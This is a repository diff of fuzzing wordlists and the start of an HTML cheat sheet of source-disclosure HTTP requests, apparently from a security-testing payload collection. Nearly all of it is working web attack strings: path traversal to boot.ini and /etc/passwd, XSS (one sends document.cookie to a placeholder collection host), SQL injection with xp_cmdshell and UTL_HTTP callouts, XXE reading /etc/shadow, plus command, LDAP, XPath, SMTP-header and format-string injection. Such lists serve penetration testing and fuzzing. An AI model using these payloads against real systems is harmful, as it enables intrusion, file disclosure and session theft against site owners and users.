/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
||||
../../../../../../../../conf/server.xml
|
||||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
../../../../../../../../../../../../localstart.asp%00
|
||||
../../../../../../../../../../../../localstart.asp
|
||||
../../../../../../../../../../../../boot.ini%00
|
||||
../../../../../../../../../../../../boot.ini
|
||||
/./././././././././././boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00
|
||||
/../../../../../../../../../../../boot.ini
|
||||
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
||||
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00.html
|
||||
/../../../../../../../../../../../boot.ini%00.jpg
|
||||
/.../.../.../.../.../
|
||||
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
||||
%0d%0aX-Injection-Header:%20AttackValue
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
/,%ENV,/
|
||||
<!--#exec%20cmd="dir"-->
|
||||
<!--#exec%20cmd="dir"-->
|
||||
%
|
||||
#
|
||||
*
|
||||
}
|
||||
;
|
||||
/
|
||||
\
|
||||
\\
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<<
|
||||
<<<
|
||||
|
|
||||
||
|
||||
`
|
||||
-
|
||||
--
|
||||
*|
|
||||
^'
|
||||
\'
|
||||
/'
|
||||
@'
|
||||
(')
|
||||
{'}
|
||||
[']
|
||||
*'
|
||||
#'
|
||||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
\t
|
||||
"\t"
|
||||
|
||||
|
||||
|
||||
|
||||
#xD
|
||||
#xA
|
||||
#xD#xA
|
||||
#xA#xD
|
||||
/%00/
|
||||
%00/
|
||||
%00
|
||||
<?
|
||||
%3C
|
||||
%3C%3F
|
||||
%60
|
||||
%5C
|
||||
%5C/
|
||||
%7C
|
||||
%00
|
||||
/%2A
|
||||
%2A
|
||||
%2C
|
||||
%20
|
||||
%20|
|
||||
%250a
|
||||
%2500
|
||||
../
|
||||
%2e%2e%2f
|
||||
..%u2215
|
||||
..%c0%af
|
||||
..%bg%qf
|
||||
..\
|
||||
..%5c
|
||||
..%%35c
|
||||
..%255c
|
||||
..%%35%63
|
||||
..%25%35%63
|
||||
..%u2216
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
\x3c
|
||||
\x3C
|
||||
\u003c
|
||||
\u003C
|
||||
something%00html
|
||||
'
|
||||
/'
|
||||
\'
|
||||
^'
|
||||
@'
|
||||
{'}
|
||||
[']
|
||||
*'
|
||||
#'
|
||||
">xxx<P>yyy
|
||||
"><script>"
|
||||
<script>alert("XSS")</script>
|
||||
<<script>alert("XSS");//<</script>
|
||||
<script>alert(document.cookie)</script>
|
||||
'><script>alert(document.cookie)</script>
|
||||
'><script>alert(document.cookie);</script>
|
||||
\";alert('XSS');//
|
||||
%3cscript%3ealert("XSS");%3c/script%3e
|
||||
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
|
||||
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
|
||||
<script>alert(document.cookie);</script>
|
||||
<script>alert(document.cookie);<script>alert
|
||||
<xss><script>alert('XSS')</script></vulnerable>
|
||||
<IMG%20SRC='javascript:alert(document.cookie)'>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("'XSS'")`>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
<IMG%20SRC='javasc ript:alert(document.cookie)'>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
|
||||
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
|
||||
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
|
||||
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
||||
'';!--"<XSS>=&{()}
|
||||
|
||||
'
|
||||
"
|
||||
#
|
||||
-
|
||||
--
|
||||
' --
|
||||
--';
|
||||
' ;
|
||||
= '
|
||||
= ;
|
||||
= --
|
||||
\x23
|
||||
\x27
|
||||
\x3D \x3B'
|
||||
\x3D \x27
|
||||
\x27\x4F\x52 SELECT *
|
||||
\x27\x6F\x72 SELECT *
|
||||
'or select *
|
||||
admin'--
|
||||
';shutdown--
|
||||
<>"'%;)(&+
|
||||
' or ''='
|
||||
' or 'x'='x
|
||||
" or "x"="x
|
||||
') or ('x'='x
|
||||
0 or 1=1
|
||||
' or 0=0 --
|
||||
" or 0=0 --
|
||||
or 0=0 --
|
||||
' or 0=0 #
|
||||
" or 0=0 #
|
||||
or 0=0 #
|
||||
' or 1=1--
|
||||
" or 1=1--
|
||||
' or '1'='1'--
|
||||
"' or 1 --'"
|
||||
or 1=1--
|
||||
or%201=1
|
||||
or%201=1 --
|
||||
' or 1=1 or ''='
|
||||
" or 1=1 or ""="
|
||||
' or a=a--
|
||||
" or "a"="a
|
||||
') or ('a'='a
|
||||
") or ("a"="a
|
||||
hi" or "a"="a
|
||||
hi" or 1=1 --
|
||||
hi' or 1=1 --
|
||||
hi' or 'a'='a
|
||||
hi') or ('a'='a
|
||||
hi") or ("a"="a
|
||||
'hi' or 'x'='x';
|
||||
@variable
|
||||
,@variable
|
||||
PRINT
|
||||
PRINT @@variable
|
||||
select
|
||||
insert
|
||||
as
|
||||
or
|
||||
procedure
|
||||
limit
|
||||
order by
|
||||
asc
|
||||
desc
|
||||
delete
|
||||
update
|
||||
distinct
|
||||
having
|
||||
truncate
|
||||
replace
|
||||
like
|
||||
handler
|
||||
bfilename
|
||||
' or username like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or uid like '%
|
||||
' or user like '%
|
||||
exec xp
|
||||
exec sp
|
||||
'; exec master..xp_cmdshell
|
||||
'; exec xp_regread
|
||||
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
||||
--sp_password
|
||||
\x27UNION SELECT
|
||||
' UNION SELECT
|
||||
' UNION ALL SELECT
|
||||
' or (EXISTS)
|
||||
' (select top 1
|
||||
'||UTL_HTTP.REQUEST
|
||||
1;SELECT%20*
|
||||
to_timestamp_tz
|
||||
tz_offset
|
||||
<>"'%;)(&+
|
||||
'%20or%201=1
|
||||
%27%20or%201=1
|
||||
%20$(sleep%2050)
|
||||
%20'sleep%2050'
|
||||
char%4039%41%2b%40SELECT
|
||||
'%20OR
|
||||
'sqlattempt1
|
||||
(sqlattempt2)
|
||||
|
|
||||
%7C
|
||||
*|
|
||||
%2A%7C
|
||||
*(|(mail=*))
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
*(|(objectclass=*))
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
(
|
||||
%28
|
||||
)
|
||||
%29
|
||||
&
|
||||
%26
|
||||
!
|
||||
%21
|
||||
' or 1=1 or ''='
|
||||
' or ''='
|
||||
x' or 1=1 or 'x'='y
|
||||
/
|
||||
//
|
||||
//*
|
||||
*/*
|
||||
@*
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
<name>','')); phpinfo(); exit;/*</name>
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
||||
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
||||
|
||||
'
|
||||
'--
|
||||
' or 1=1--
|
||||
1 or 1=1--
|
||||
' or 1 in (@@version)--
|
||||
1 or 1 in (@@version)--
|
||||
'; waitfor delay '0:30:0'--
|
||||
1; waitfor delay '0:30:0'--
|
||||
'||Utl_Http.request('http://<yourservername>') from dual--
|
||||
1||Utl_Http.request('http://<yourservername>') from dual--
|
||||
xsstest
|
||||
xsstest%00"<>'
|
||||
</foo>
|
||||
<foo></foo>
|
||||
))))))))))
|
||||
../../../../../../../../../../boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
../../../../../../../../../../windows/win.ini
|
||||
..\..\..\..\..\..\..\..\..\..\windows\win.ini
|
||||
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
|
||||
| ping -i 30 127.0.0.1 |
|
||||
| ping -n 30 127.0.0.1 |
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
; ping 127.0.0.1 ;
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
`ping 127.0.0.1`
|
||||
;echo 111111
|
||||
echo 111111
|
||||
response.write 111111
|
||||
:response.write 111111
|
||||
http://<yourservername>/
|
||||
<youremail>%0aCc:<youremail>
|
||||
<youremail>%0d%0aCc:<youremail>
|
||||
<youremail>%0aBcc:<youremail>
|
||||
<youremail>%0d%0aBcc:<youremail>
|
||||
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
|
||||
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
|
||||
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
|
||||
%70
|
||||
.%E2%73%70
|
||||
%2e0
|
||||
%2e
|
||||
.
|
||||
\
|
||||
?*
|
||||
%20
|
||||
%00
|
||||
%2f
|
||||
%5c
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
||||
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
||||
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
||||
%00
|
||||
NULL
|
||||
null
|
||||
'
|
||||
"
|
||||
;
|
||||
<!
|
||||
-
|
||||
=
|
||||
+
|
||||
"
|
||||
&
|
||||
!
|
||||
|
|
||||
<
|
||||
>
|
||||
"><script>alert(1)</script>
|
||||
%0d
|
||||
%0a
|
||||
%7f
|
||||
%ff
|
||||
-1
|
||||
other
|
||||
%s%p%x%d
|
||||
%99999999999s
|
||||
%08x
|
||||
%20d
|
||||
%20n
|
||||
%20x
|
||||
%20s
|
||||
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
||||
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
||||
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
||||
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
||||
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
||||
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
||||
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
||||
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
||||
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
||||
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
||||
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
||||
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
||||
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
||||
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
||||
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
||||
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
||||
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
||||
XXXXX.%p
|
||||
XXXXX`perl -e 'print ".%p" x 80'`
|
||||
`perl -e 'print ".%p" x 80'`%n
|
118
attack-payloads/all-attacks/interesting-metacharacters.txt
Normal file
118
attack-payloads/all-attacks/interesting-metacharacters.txt
Normal file
|
@ -0,0 +1,118 @@
|
|||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
"><script>"
|
||||
">xxx<P>yyy
|
||||
"\t"
|
||||
#
|
||||
#'
|
||||
#'
|
||||
#xA
|
||||
#xA#xD
|
||||
#xD
|
||||
#xD#xA
|
||||
$NULL
|
||||
$null
|
||||
%
|
||||
%00
|
||||
%00/
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
%0a
|
||||
%20
|
||||
%20|
|
||||
%2500
|
||||
%250a
|
||||
%2A
|
||||
%2C
|
||||
%2e%2e%2f
|
||||
%3C%3F
|
||||
%5C
|
||||
%5C/
|
||||
%60
|
||||
%7C
|
||||
|
||||
|
||||
|
||||
|
||||
'
|
||||
";id"
|
||||
(')
|
||||
*
|
||||
*'
|
||||
*'
|
||||
*|
|
||||
+%00
|
||||
-
|
||||
--
|
||||
-1
|
||||
-1.0
|
||||
-2
|
||||
-20
|
||||
-268435455
|
||||
..%%35%63
|
||||
..%%35c
|
||||
..%25%35%63
|
||||
..%255c
|
||||
..%5c
|
||||
..%bg%qf
|
||||
..%c0%af
|
||||
..%u2215
|
||||
..%u2216
|
||||
../
|
||||
..\
|
||||
/
|
||||
/%00/
|
||||
/%2A
|
||||
/'
|
||||
/'
|
||||
0
|
||||
00
|
||||
0xfffffff
|
||||
1
|
||||
1.0
|
||||
2
|
||||
2147483647
|
||||
268435455
|
||||
65536
|
||||
;
|
||||
< script > < / script>
|
||||
<?
|
||||
?x=
|
||||
?x="
|
||||
?x=>
|
||||
?x=|
|
||||
@'
|
||||
@'
|
||||
A
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
FALSE
|
||||
NULL
|
||||
TRUE
|
||||
[']
|
||||
[']
|
||||
\
|
||||
\"blah
|
||||
\'
|
||||
\'
|
||||
\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
\0\0
|
||||
\0\0\0
|
||||
\\
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
\t
|
||||
^'
|
||||
^'
|
||||
`
|
||||
id%00
|
||||
id%00|
|
||||
null
|
||||
something%00html
|
||||
{'}
|
||||
{'}
|
||||
|
|
||||
}
|
|
@ -0,0 +1,11 @@
|
|||
# append after dir name - leave slashes to this file - don't prepend one in your fuzzer
|
||||
/%3f.jsp
|
||||
?M=D
|
||||
/?S=D
|
||||
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
|
||||
/cgi-bin/test-cgi?/*
|
||||
/cgi-bin/test-cgi?*
|
||||
/%00/
|
||||
/%2e/
|
||||
/%2f/
|
||||
/%5c/
|
|
@ -0,0 +1,914 @@
|
|||
<html>
|
||||
|
||||
<head>
|
||||
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
|
||||
<meta name=Generator content="Microsoft Word 10 (filtered)">
|
||||
<title>Source Code, File, and Directory Disclosure Cheat Sheet</title>
|
||||
|
||||
<style>
|
||||
<!--
|
||||
/* Style Definitions */
|
||||
p.MsoNormal, li.MsoNormal, div.MsoNormal
|
||||
{margin:0cm;
|
||||
margin-bottom:.0001pt;
|
||||
font-size:12.0pt;
|
||||
font-family:"Times New Roman";}
|
||||
h2
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:18.0pt;
|
||||
font-family:"Times New Roman";
|
||||
color:#354278;}
|
||||
h5
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:10.0pt;
|
||||
font-family:"Times New Roman";
|
||||
color:#354278;}
|
||||
a:link, span.MsoHyperlink
|
||||
{color:blue;
|
||||
text-decoration:underline;}
|
||||
a:visited, span.MsoHyperlinkFollowed
|
||||
{color:purple;
|
||||
text-decoration:underline;}
|
||||
p.doctext, li.doctext, div.doctext
|
||||
{margin-right:0cm;
|
||||
margin-left:0cm;
|
||||
font-size:10.5pt;
|
||||
font-family:"Times New Roman";
|
||||
color:black;}
|
||||
span.docemphasis1
|
||||
{font-style:italic;}
|
||||
@page Section1
|
||||
{size:595.3pt 841.9pt;
|
||||
margin:3.0cm 2.0cm 3.0cm 2.0cm;}
|
||||
div.Section1
|
||||
{page:Section1;}
|
||||
-->
|
||||
</style>
|
||||
|
||||
</head>
|
||||
|
||||
<body lang=DA link=blue vlink=purple>
|
||||
|
||||
<div class=Section1>
|
||||
|
||||
<p class=doctext><span lang=EN-GB>This appendix contains a list of all the
|
||||
major source code disclosure techniques discovered over the years. Many of them
|
||||
are specific to particular bugs in particular versions of software. </span>Others
|
||||
are generic across platforms and have been known to reappear contrary to what
|
||||
the vendors say.</p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><a name=app04table01></a><span
|
||||
style='font-size:10.5pt;font-family:Arial'>Source Code, File, and
|
||||
Directory Disclosure Cheat Sheet</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Vulnerable Application</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>HTTP Request</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Vulnerability Information</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire ColdFusion </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /CFDOCS/snippets/viewexample.cfm?viewexample.cfm Tagname=<span
|
||||
class=docemphasis1><relative path to CFM file></span> HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/115" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/115</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun Alternative Data Stream </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET /file.jsp::$DATA HTTP/1.0 </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3664" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3664</span></a> </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>Allaire JRun Server Side Include </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>GET /file HTTP/1.0</p>
|
||||
<p class=doctext>Content Length: <span class=docemphasis1><length of
|
||||
filename + 28></span> <!—#include virtual="<span
|
||||
class=docemphasis1><filename></span>"—></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'><a href="http://www.securityfocus.com/bid/3589" target="_blank"><span
|
||||
style='color:#003399'>http://www.securityfocus.com/bid/3589</span></a> </span></p>
|
||||
</td>
|
||||
